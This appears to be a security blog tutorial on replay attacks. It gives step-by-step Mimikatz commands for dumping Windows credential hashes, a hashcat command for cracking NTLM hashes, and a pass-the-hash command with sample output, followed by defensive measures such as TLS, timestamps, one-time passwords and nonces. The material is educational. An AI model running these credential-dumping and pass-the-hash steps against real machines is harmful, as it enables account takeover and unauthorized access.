Sun Mar 05

Replay attack and Hashes Dumping with Mimikatz

You log in to a website, providing a username and password and ticking the "remember me" option to enter your dashboard. You have followed best practice for your password, such as using a strong, unique password with a combination of uppercase, lowercase, numbers and special characters. You also change the password regularly and avoid using any personal information. Some time later your account is hacked, and you have no idea how it could have happened. This is a scenario in which a replay attack may have taken place.

What is a replay attack?

A replay attack is a security attack in which an attacker intercepts and captures data transmitted between two parties, and then reuses that data to gain unauthorized access to a system or service at a later time. This type of attack can take advantage of sensitive information such as session IDs or cookies that are stored in the web browser. On a system, the data can also be stored as a hash that represents the user's credentials.

This information is then used to deceive the targeted service or system into believing that the attacker is a legitimate user attempting to log in, allowing the actor to gain unauthorized access. The attacker may gain access to the user's account and dashboard without knowing the actual password, or may obtain certain user privileges.

Examples of replay attack

As the title says, we are going to simulate how a replay attack works by practicing it with Mimikatz. With Mimikatz, we can dump the credential hashes that a Windows machine keeps in memory.

Back then, Windows relied on NTLM for authentication, confidentiality, and integrity. NTLM relies on a password hashing mechanism. While it is still supported by Windows, it has since been superseded by Kerberos. In fact, we can push this further with the Golden Ticket attack using the same tool. That kind of attack targets a network protected with Kerberos and tries to gain almost unlimited access to the entire network.

But for now, we are going to limit the scope so you can see how this hash can be used to trace back to the actual password. We can also use the hash right away, without cracking it, to gain access to a particular user account with the pass-the-hash attack, which is a well-known instance of a replay attack.

For educational purposes only, we suggest using Kali or any Linux distribution that you are comfortable with. It is important that you practice it on your own system, and please note that we cannot be held responsible for any wrongdoing or illegal activity that may result from your use of this information.

Running Mimikatz

First, you need Mimikatz running on the target PC. You can reach the target PC, for example, by connecting to the Windows machine via SSH. After that, run mimikatz.exe on that computer with the following command.

C:\Users\Administrator>mimikatz.exe

Ensuring it runs with Administrator privilege

Mimikatz requires Administrator privilege. Hence, you need to run the following command and check the result. Make sure that the command returns Privilege '20' OK; otherwise, it won't run properly.

mimikatz # privilege::debug
Privilege '20' OK

Dumping the hashes

To dump the hashes, use the following command.

mimikatz # sekurlsa::logonpasswords

This command dumps the credentials of all logon sessions held in memory on the machine. You can then search for a user name and focus on a few values, including the username, domain, and NTLM hash. Here is an example.

msv :
 [00000003] Primary
 Username : Bob
 Domain   : XYZ
 NTLM     : a9fdfa038c4b75ebc76dc855dd74f0da

Cracking the hash with hashcat

You need the hashcat tool to crack the hash. You can go back to your Linux system. Assuming you are using Kali, you probably need to first extract the wordlist we are going to use with the following command.

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

After that you can run hashcat and recover the actual password. Note, however, that this process can be resource intensive.

hashcat -m 1000 <hash> /usr/share/wordlists/rockyou.txt

Using pass-the-hash technique

Alternatively, you can use the pass-the-hash technique to gain access to a user account with the following command.

mimikatz # sekurlsa::pth /user:Bob /domain:xyz.local /ntlm:a9fdfa038c4b75ebc76dc855dd74f0da

Using this, you don't have to crack the password; the hash itself is used for authentication. A new command prompt will then show up and you can switch into it. Check whether you have successfully gained access with this command.

whoami

How to prevent replay attacks?

Now that you know that information other than your actual credentials can be used to gain access to your account, it is essential to take extra precautions when securing your accounts. There are several known ways to effectively prevent replay attacks.

Encryption

While the case above only covers a Windows system that stores user credentials in the form of hashes, online client-server communication typically uses a session ID instead.

A session ID is the piece of data used as the identity of the current message exchange. Sessions are common in client-server communication, where the server maintains a session with a particular user. The server sends the session ID to the requester (client) and keeps track of the currently open session.

Unfortunately, this session ID can be hijacked by an attacker, as the client stores it inside the browser. Using techniques like request forgery, the attacker may be able to pose as the client and communicate with the server without needing the actual user credentials.

This is why encryption such as SSL and TLS plays a critical role in protecting the communication. An attacker who intercepts the traffic only sees ciphertext and cannot locate the session ID.

Time stamping

A timestamp can be included in each request to the server. This is what the Kerberos protocol does with ticket granting: a ticket is only valid within a certain period of time, which limits the effectiveness of a replay attack.

One time password

Using a one-time password (OTP) can be very effective in preventing replay attacks. The server passes the OTP to the client, and the client must respond to the server with the given OTP, which is only valid once.

Nonce-based authentication

Servers can also use a randomly generated value known as a nonce every time they communicate with the client. A nonce makes each request unique, thereby preventing attackers from executing a replay attack or communicating with the server, even with a valid server response captured during a man-in-the-middle attack.

Conclusion

Replay attacks present a significant threat to security, as they deceive a system with reused valid data, potentially resulting in severe consequences. Even seemingly convenient features like "remember me" can have serious security drawbacks. It is therefore critical to mitigate the risk of replay attacks through encryption and the other preventative measures described above.